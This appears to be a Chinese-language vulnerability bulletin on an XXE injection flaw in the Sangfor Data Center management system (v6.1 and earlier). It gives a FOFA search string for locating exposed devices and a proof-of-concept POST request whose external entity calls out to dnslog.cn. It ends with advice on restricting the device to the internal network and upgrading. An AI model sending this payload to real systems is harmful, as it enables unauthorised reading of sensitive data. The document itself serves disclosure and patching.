0x01 產品簡介

? ?深信服數據中心管理系統DC為AC的外置數據中心，主要用于海量日志數據的異地擴展備份管理，多條件組合的高效查詢，統計和趨勢報表生成，設備運行狀態監控等功能。

0x02 漏洞概述

??深信服數據中心管理系統DC存在XML外部實體注入漏洞。由于后端對傳入的XML對象進行了非預期內解析，攻擊者可以利用該漏洞進行XML注入攻擊，獲取系統敏感信息。

0x03 影響范圍

? ? v6.1及以下版本

0x04 復現環境

FOFA：?"SANGFOR 數據中心"

0x05 漏洞復現?

PoC

POST /src/sangforindex HTTP/1.1
Host: your-ip
Content-Type: text/xml<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [<!ENTITY rt SYSTEM "http://dnslog.cn">
]>
<xxx>
&rt;
</xxx>

驗證

0x06 修復建議

規避措施

將設備端口收縮內網，可削減漏洞被利用風險。

升級方案

2016年4月發布的數據中心管理系統v11.0及以上版本已修復，受影響用戶可通過升級版本，完成對漏洞的修復。可撥打深信服漏洞專屬修復熱線400-005-5530獲取或聯系當地服務人員。